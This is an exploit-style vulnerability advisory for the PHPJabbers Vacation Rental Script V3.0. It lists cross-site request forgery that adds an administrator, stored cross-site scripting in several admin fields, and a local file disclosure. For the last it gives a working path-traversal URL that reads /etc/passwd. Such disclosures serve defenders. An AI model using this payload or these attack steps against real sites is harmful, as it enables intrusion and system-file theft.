Vacation Rental Script V3.0 - Multiple Vulnerabilties ==================================================================== #################################################################### .:. Author : HackXBack .:. Contact : h-b@usa.com .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.phpjabbers.com/vacation-rental-script/ .:. Tested On Demo : http://www.phpjabbers.com/demo/vrl_30/1389729977/index.php?controller=pjAdmin&action=pjActionLogin #################################################################### ===[ Exploit ]=== [1] Cross Site Request Forgery ============================== [Add Admin] [2] Multiple Cross Site Scripting ================================== # CSRF with XSS Exploit: I. Xss In Types II. Xss In Features III. Xss In Countries [3] Local File disclure ======================== http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd ####################################################################